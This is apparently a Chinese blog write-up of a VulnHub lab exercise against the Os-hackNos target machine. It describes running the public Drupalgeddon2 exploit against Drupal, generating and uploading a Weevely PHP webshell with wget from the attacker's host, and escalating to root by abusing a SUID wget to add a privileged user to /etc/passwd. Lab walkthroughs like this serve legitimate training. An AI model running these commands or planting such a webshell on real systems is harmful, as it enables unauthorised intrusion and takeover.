靶机Os-hackNos渗透提权日志

261 阅读3分钟

靶机下载地址:download.vulnhub.com/hacknos/Os-…

    

     测试环境:

     靶机:    192.168.1.115 攻击机:192.168.1.113

      前些工作上的事,一直无法抽一个完整的时间来做渗透练习。渗透攻击技能的提高一方面是加强理论的学习,更重要的是多找题目实战,不管是什么级别、什么难度的靶机搭好环境就开火。每次搞定靶机后,你总会感到胜利的喜悦的。

      我们进入正题吧。第一阶段的信息收集就不多说了,因为靶机是在自己虚拟机上安装的,所以第一步发现目标、勘查目标是套路,没有什么新意。上几个图吧。

1.端口扫描和目录发现

图片

图片

图片

  
2.漏洞发现于利用

    今天学习利用drupal 这个开源CMS。这里从百度百科里抄录了一段有关介绍。

      Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。截止2011年底,共有13,802位WEB专家参加了Drupal的开发工作;228个国家使用181种语言的729,791位网站设计工作者使用Drupal。著名案例包括:联合国、美国白宫、美国商务部、纽约时报、华纳、迪斯尼、联邦快递、索尼、美国哈佛大学、Ubuntu等。

图片

       这个漏洞怎么利用,有大牛制作好的现成的脚本可以拿来直接用到自己的靶机上。步骤如下:

1.geminstall highline(在运行脚本前,需要预装依赖包highline)

2.git clonehttps://github.com/dreadlocked/Drupalgeddon2.git(下载脚本)

3.#./drupalgeddon2.rb http://192.168.1.115/drupal/

4.运行后的结果如下:

图片

通过上面的脚本取得了www-data的一般用户权限,这不是我们的最终目标。

图片

接下来就是:

3.权限提升

在这里,我第一次练习如何使用Kali中的中国菜刀-Weevely。

第一步:使用weevely生成小马

在攻击机上运行:

weevelygenerate cmd ./xiaoma.php

xiaoma.php就是生成的木马文件,cmd是执行口令。

第二步:上传木马文件:

在攻击机上开启HTTP服务

python -mSimpleHTTPServer

在靶机上运行下列脚本,将小马上传至靶机

wget ``http://192.168.1.113:8000/xiaoma.php

第三步:在攻击机上运行下列脚本,weevely连接木马

weevely http://``192.168``.``1.115``/drupal/xiaoma.php  cmd

上面操作完成后,发现系统提示:

图片

肿么办?可以使用suid提权的办法进行系统提权。

从suid权限查看命令执行的结果可以看出,wget命令可以可以使普通用户以root权限执行,即我们可以利用它修改passwd文件,加入特权用户wget命令可以可以使普通用户以root权限执行,即我们可以利用它修改passwd文件,加入特权用户可以使用openssl工具。关于这个工具的使用可以自行学习,此处不多言。

图片

即使添加了特权用户wellsong,发现还是不能root提权。

**
**

图片

又卡住!肿么办?祭出meterperter神器!放大招!

图片

稳住!保持即得果实,加固!

图片

使用之前新增的特权用户wellsong提权!

图片

至此,渗透的终极目标已经达到了。靶机已经被完全控制了。进靶机看看吧。

图片

图片

扫码_搜索联合传播样式-标准色版.png